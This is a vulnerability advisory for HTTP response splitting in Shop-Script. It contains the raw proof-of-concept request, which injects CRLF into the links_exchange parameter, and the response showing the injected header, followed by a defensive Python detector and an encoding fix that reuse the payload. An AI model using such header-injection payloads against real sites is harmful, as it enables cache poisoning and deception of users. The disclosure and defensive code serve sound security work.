Vendor: Shop-Script
By: SecurityFocus
CVSS: 7,5 (HIGH)
CWE: 113 (HTTP Response-Splitting)
Product Name: Shop-Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Shop-Script Multiple HTTP Response-Splitting Vulnerabilities

Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

Mitigation:

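Validate and sanitize user-supplied input before it is written into HTTP response headers. In particular, carriage-return and line-feed characters (%0d%0a in the request below) must not reach the Location header unencoded.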

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20685/info

[Request Header]

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.example.com
Content-Length: 18
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
Connection: Close
Pragma: no-cache

current_currency=1


[Response Header]

HTTP/1.1 302 Found
Date: Mon, 16 Oct 2006 17:39:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php?links_exchange=
FakeHeader:Fake_Custom_Header <= [Custom response injected by the attacker]
Content-Length: 0
Connection: close
Content-Type: text/html
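
The mitigation above, as an added defensive example in Python (not Shop-Script's code and not part of the original advisory): a detector that flags query parameters carrying CR/LF after percent-decoding, and a redirect builder that percent-encodes the reflected value so it cannot end the Location line. The function names and the sample list are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, quote, unquote

CRLF = re.compile(r"[\r\n]")

def find_crlf_params(request_target, max_decode=3):
    """Return names of query parameters whose value contains CR or LF.

    Values are checked after each of up to max_decode rounds of
    percent-decoding, because a proxy or the application may decode
    the value more than once before it reaches a response header.
    """
    hits = []
    query = urlsplit(request_target).query
    # parse_qsl performs the first round of percent-decoding.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for _ in range(max_decode):
            if CRLF.search(value):
                hits.append(name)
                break
            decoded = unquote(value)
            if decoded == value:   # fully normalised, nothing left to decode
                break
            value = decoded
    return hits

def safe_location(base, param, value):
    """Build a Location header value with the parameter percent-encoded,
    so CR/LF in `value` is emitted as %0D%0A instead of a line break."""
    if CRLF.search(base) or CRLF.search(param):
        raise ValueError("CR/LF in the fixed part of the redirect target")
    return f"{base}?{quote(param, safe='')}={quote(value, safe='')}"

# Constructed sample request targets: the first is the request line shown
# in the advisory above, the second is a benign request for comparison.
SAMPLES = [
    "/premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header",
    "/premium/index.php?links_exchange=1&current_currency=1",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(target, "->", find_crlf_params(target) or "clean")
    print("Location:", safe_location(
        "index.php", "links_exchange", "\r\nFakeHeader:Fake_Custom_Header"))
```

With the encoded value, the redirect from the response above would carry a single Location line and no separate FakeHeader line.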